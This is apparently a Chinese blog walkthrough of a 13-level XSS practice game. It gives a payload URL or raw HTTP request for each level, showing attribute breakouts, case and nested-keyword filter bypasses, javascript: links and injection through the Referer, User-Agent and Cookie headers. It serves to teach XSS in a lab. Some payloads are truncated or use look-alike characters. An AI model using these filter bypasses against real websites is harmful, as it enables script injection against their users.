ctf xss利用_【CTF】某xss练手小游戏

最新推荐文章于 2024-07-25 13:45:00 发布
最新推荐文章于 2024-07-25 13:45:00 发布
阅读量290 收藏
点赞数
文章标签: ctf xss利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31188325/article/details/112950714
版权
本文介绍了在ctf比赛中遇到的一系列XSS练习,包括不同级别的漏洞利用方法,如事件注入、编码绕过、标签嵌套等,详细展示了如何构造有效payload来触发XSS攻击。
摘要由CSDN通过智能技术生成

http://test.xss.tv

1、http://47.94.13.75/test/level1.php?name=test

直接插入即可,如:

http://47.94.13.75/test/level1.php?name=

2、http://47.94.13.75/test/level2.php?keyword=test

文本框中输入,闭合一下即可,如:

http://47.94.13.75/test/level2.php?keyword=">

3、http://47.94.13.75/test/level3.php?writing=wait

尖括号被编码,直接使用事件即可,如:

http://47.94.13.75/test/level3.php?keyword=' οnmοuseοver=alert(1) '&submit=搜索

4、http://47.94.13.75/test/level4.php?keyword=try harder!

与第三关类似,使用事件来闭合,弹窗,如:

http://47.94.13.75/test/level4.php?keyword=" οnmοuseοver=alert(1) "&submit=搜索

5、http://47.94.13.75/test/level5.php?keyword=find a way out!

事件被插入特殊符号,改用其它标签,如:

http://47.94.13.75/test/level5.php?keyword=">click&submit=搜索

点击click链接即可弹窗

6、http://47.94.13.75/test/level6.php?keyword=break it out!

与第五关类似,这里可以直接用大写绕过,如:

http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索

7、http://47.94.13.75/test/level7.php?keyword=move up!

on直接被过滤,用嵌套绕过,如:

http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索

8、http://47.94.13.75/test/level8.php?keyword=nice try!

链接型,js协议加编码绕过绕过,如:

http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情链接

9、http://47.94.13.75/test/level9.php?keyword=not bad!

构造合法链接,结合js协议与编码绕过,如:

http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情链接

10、http://47.94.13.75/test/level10.php?keyword=well done!

根据源码构造url参数,如:

http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" οnmοuseοver=alert(1) type="button" "

http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" οnclick=“alert(1)  ///通过shift+alt+X快捷键触发(火狐可以)

11、http://47.94.13.75/test/level11.php?keyword=good job!

抓取post数据包,构造referer值,如:

GET /test/level11.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Referer:" οnmοuseοver=alert(1) type="button" "

12、http://47.94.13.75/test/level12.php?keyword=good job!

构造user-agent值即可,如:

GET /test/level12.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" οnmοuseοver=alert(1) type="button" "

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

13、http://47.94.13.75/test/level13.php?keyword=good job!

构造cookie,如:

GET /test/level13.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Cookie: user=call+me+maybe%3F" οnmοuseοver=alert(1) type="button" "

Connection: keep-alive

Upgrade-Insecure-Requests: 1

原雪婷
关注
XSS练习
haha1314的博客
07-21 885
0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script> 0x01 function render (input) { return...
ctf xss利用_CTF XSS
weixin_33945512的博客
01-14 1148
CTF XSS这一块接触的不多,这次先当搬运工,之后慢慢补上自己的东西渗透流程fuzz"'#$%^'";!-=#$%^&{()}alert(String.fromCharCode(88,83,83));prompt(1);confirm(1)绕过标签之间先闭合标签JS标签内空格被过滤:/**/输出注释中:换行符%0a``%0d字符串中闭合引号、宽字节文本属性中把所有的payload转为HTML M...
CTF-XSS
H2223的博客
07-26 647
链接https提取码6elk使用phpstudy运行。
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
最新发布
2401_82672634的博客
07-25 1526
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
CTFXSS浅谈(xsslabs)
glass_york的博客
10-07 764
主要针对XSS入门和XSSLABS前7关挑战
ctfshow XSS专题
yink12138的博客
12-17 1523
ctfshow XSS专题
CTF学习3(XSS)
2301_79688134的博客
02-29 407
alert()
ctf xss利用_一道XSS题目分析
weixin_39960147的博客
01-14 1240
目录0x00 介绍题目地址:https://challenge.intigriti.io/题目的要求是绕过CSP实现XSS,执行alert(document.domain)。0x01 解决页面中加载了个script.js:varhash=document.location.hash.substr(1);if(hash){displayReason(hash);}document.getEle...
ctf xss利用_xss总结--2018自我整理
weixin_39851809的博客
01-14 1352
0x00前言因为ctfxss的题目偏少(因为需要机器人在后台点选手的连接2333),所有写的比较少0x01xss作用常见的输出函数:print()、 print_r()、 echo、 printf()、 sprintf()、 die()、 var_dump()、 var_export()xss是往页面中添加了一段代码,并且被浏览器执行了反射型将恶意代码写入参数,或者自己服务器上搭个form表单传...
ctf xss利用_TCTF/0CTF2018 XSS Writeup
weixin_29923451的博客
01-14 550
作者:LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...
CTF学习笔记——XSS攻击
Obs_cure的博客
08-02 9939
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。[1]百度百科 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,与之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签
ctf xss利用_从xss挑战之旅来重读xss(一)
weixin_39735166的博客
11-29 663
在开始这篇文章之前,先简单聊几句: - xss很多时候是鸡肋,比如说self-xss - 很多厂商都会注明拒收反射xss,如58src - 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss - 遇到收反射xss的,证明截图拿cookies能比alert弹个窗多很多money - xss有时候也值很多钱,比如说某厂商的一个存储xss就给了3.5k其实我们基本上都知道xss是什么,在给厂商...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1647
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
ctf xss利用_CTF小白入门- 跨站脚本攻击
weixin_39984952的博客
02-23 1146
跨站脚本攻击(Cross Site Scripting , XSS)是指攻击者巧妙的将恶意代码注入到网页中,当用户浏览器中加载网页、渲染网页时,就会执行的恶意代码的过程。经常遭到XSS漏洞的典型应用有 邮件、论坛、留言板等。新浪微博、百度贴吧也曾遭受过 XSS攻击。对内容有不理解的小伙伴或发现错误的小伙伴,可以私信和我联系,共同探讨。如果您喜欢,麻烦点个赞,(づ ̄ 3 ̄)づXSS可以造成哪些危害?...
在线XSS练习
失心疯的博客
06-26 1782
在线XSS练习 目录 环境 参考 环境 xss.tv firefox 参考 xss挑战平台练习 xss tv 挑战笔记
ctf_show笔记篇(web入门---XSS
whale_waves的博客
04-01 1379
这里简单对xss做一个了解:xss分为反射型和储存型反射型:一般是由攻击者选择攻击对象,对攻击对象发一个带有xss窃取cookie的页面的url,被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器,当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型:攻击方将恶意代码插入在存在漏洞的网站上,任何访问网站的人都会遭到攻击,比起反射型xss,存储型xss危害更大,范围更广。
php xss ctf,GitHub - qiaofei32/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具
weixin_39984201的博客
04-08 282
XSS数据接收平台(无SQL版)如从旧版本升级,请务必先阅读Readme平台说明本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用SAE用户请切换到sae分支,并阅读sae分支下的README.md安装说明自动安装安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt...
CTF特训营》——跨站脚本攻击(XSS
PICACHU+++的博客
07-15 2342
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
【web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2538
XSS-pikachu
010ctf xss
08-24
在010ctf中,XSSPawn是一种灵活且可自定义的访客bot,用于CTF挑战设置,主要是XSS攻击的挑战。它是基于触发器的,由Express驱动的服务,依赖于HTTP请求通信。 在XSS攻击中,一般情况下,self代表只接受符合同源策略的url,这样大部分的XSS和CSRF攻击都会失效。但是link标签是一个例外,我们可以通过link标签绕过CSP(Content Security Policy)的限制[2]。 在CSP级别2中,定义加载frame的有效源已经被弃用,取而代之的是child-src指令。而在CSP级别3中,虽然frame-src被弃用,但如果不存在,它将继续遵从child-src指令。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [XSSPawn:XSSPawn是一种灵活且可自定义的访客... 主要用作CTF XSS Bot。 它基于CTFTraining的base_image_xssbot](https://download.csdn.net/download/weixin_42160278/16560757)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTF XSS](https://blog.csdn.net/weixin_33945512/article/details/112950722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值